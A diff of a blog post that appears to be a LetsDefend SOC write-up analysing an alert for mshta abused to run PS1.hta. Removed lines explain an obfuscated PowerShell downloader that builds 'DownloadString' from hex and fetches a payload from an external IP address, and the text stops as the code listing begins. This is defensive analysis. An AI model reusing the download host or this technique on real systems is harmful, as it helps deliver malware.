aldosimon/aldosimon.github.io/_posts/2022-04-15-write-up-letsdefend.io-Suspicious Mshta Behavior.md

 ![wup_endpoint](/images/wup_endpoint.png)

-We use end point security to find out what is really happening in the host 172.16.17.38.
+We use end point security to find out what was happening in the host 172.16.17.38.
 From the screenshot we can see that the first command line that trigger the alert, followed by weird command.

 The first command is what triggered the alert.
 Mshta is a trusted Microsoft binary that in this case is abused to proxy for execution of the PS1.hta file. you can see the related explanation here at the [MITRE](https://attack.mitre.org/techniques/T1218/005/)

-Tried a bit of magic at the second command below, where we can see a more bearable presentation.
-$H3-H6 with the help of $H1 just basically hex that reads "Downloadstring". $H2 was a glorified "New-Object Net.WebClient". and $H8 puts them all together to form an old fashion download using powershell from address mentioned in $H8 (http://193.142.58.23/Server.txt).

 ```bash
 function H1($i)